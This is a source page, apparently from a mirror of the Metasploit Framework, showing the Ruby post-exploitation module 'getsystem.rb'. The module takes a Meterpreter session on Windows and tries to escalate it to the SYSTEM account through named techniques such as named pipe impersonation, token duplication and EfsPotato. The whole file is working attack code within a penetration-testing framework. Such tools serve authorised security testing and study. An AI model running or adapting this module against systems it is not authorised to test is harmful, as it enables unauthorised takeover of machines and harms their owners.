/
githubmirror
/
metasploit-framework
Обзор
Документация
Войти
/
githubmirror
/
metasploit-framework
Код
Запросы
0
Пакеты
0
Релизы
0
Аналитика
Безопасность
master
modules/post/windows/escalate/getsystem.rb
78 строк
2 KB
Rudraditya Thakur
added: ATT&CK references to exploit and privilege escalation modules
09 фев 2026, 20:33
09 фев 2026, 20:33
8d6f775
Код
Авторство
О чём код?
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'metasm' class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv def initialize(info = {}) super( update_info( info, 'Name' => 'Windows Escalation', 'Description' => %q{ This module uses the `getsystem` command to escalate the current session to the SYSTEM account using various techniques. }, 'License' => MSF_LICENSE, 'Author' => 'hdm', 'References' => [ ['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION], ['ATT&CK', Mitre::Attack::Technique::T1548_002_BYPASS_USER_ACCOUNT_CONTROL] ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Compat' => { 'Meterpreter' => { 'Commands' => %w[ priv_elevate_getsystem ] } }, 'Notes' => { 'AKA' => [ 'Named Pipe Impersonation', 'Token Duplication', 'RPCSS', 'PrintSpooler', 'EFSRPC', 'EfsPotato' ], 'Stability' => [CRASH_SAFE], 'SideEffects' => [], 'Reliability' => [] } ) ) register_options([ OptInt.new('TECHNIQUE', [false, 'Specify a particular technique to use (1-6), otherwise try them all', 0]) ]) end def unsupported print_error('This platform is not supported with this script!') raise Rex::Script::Completed end def run technique = datastore['TECHNIQUE'].to_i unsupported if client.platform != 'windows' || (client.arch != ARCH_X64 && client.arch != ARCH_X86) if is_system? print_good('This session already has SYSTEM privileges') return end begin result = client.priv.getsystem(technique) print_good("Obtained SYSTEM via technique #{result[1]}") rescue Rex::Post::Meterpreter::RequestError print_error('Failed to obtain SYSTEM access') end end end